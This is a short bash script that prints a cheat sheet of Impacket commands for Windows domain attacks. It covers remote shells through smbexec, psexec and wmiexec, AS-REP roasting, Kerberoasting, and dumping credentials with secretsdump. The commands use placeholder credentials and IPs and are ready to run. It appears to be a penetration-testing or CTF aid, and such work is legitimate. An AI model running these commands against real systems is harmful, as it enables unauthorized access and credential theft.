#!/bin/bash

# display impacket commands for priv-esc

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

echo -e "${Frame}###${End} ${Title}Impacket-SMBExec${End} ${Frame}###${End}"
echo -e "${Comment}Impacket’s smbexec.py will give you an interactive shell on the Windows host.${End}"
echo -e "${Point} impacket-smbexec domain.local/\$user:\$password@\$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Impacket-PsExec${End} ${Frame}###${End}"
echo -e "${Comment}Impacket’s psexec.py offers psexec like functionality and will give you an interactive shell on the Windows host.${End}"
echo -e "${Point} impacket-psexec domain.local/\$user:\$password@\$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Impacket-WMIExec${End} ${Frame}###${End}"
echo -e "${Comment}Impacket’s wmiexec.py uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.${End}"
echo -e "${Point} impacket-wmiexec domain.local/\$user:\$password@\$IP"
echo -e ""


echo -e "${Frame}###${End} ${Title}Impacket-GetNPUsers${End} ${Frame}###${End}"
echo -e "${Comment}Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses and will be encrypted with the user’s password, which can then be cracked offline.${End}"
echo -e "${Point} impacket-GetNPUsers -dc-ip \$IP domain.local/ -usersfile users.txt -format hashcat [-outputfile hashes.txt]"
echo -e ""


echo -e "${Frame}###${End} ${Title}Impacket-SecretsDump${End} ${Frame}###${End}"
echo -e "${Comment}Impacket’s secretsdump.py will dump secrets from the remote machine without executing any agent.${End}"
echo -e "${Point} impacket-secretsdump domain.local/\$admin_user:\$password@\$IP"
echo -e "${Point} impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL"
echo -e ""


echo -e "${Frame}###${End} ${Title}Impacket-GetUserSPNs${End} ${Frame}###${End}"
echo -e "${Comment}Impacket’s GetUserSPNs.py will return a ticket that is encrypted with the user account’s password, which can then be bruteforced offline.${End}"
echo -e "${Point} impacket-GetUserSPNs -request -dc-ip \$IP domain.local/\$user:\$password [-outputfile hashes.kerberoast]"
echo -e "${Point} impacket-GetUserSPNs -request -dc-ip \$IP -hashes \$LMHASH:\$NTHASH domain.local/\$user [-outputfile hashes.kerberoast]"



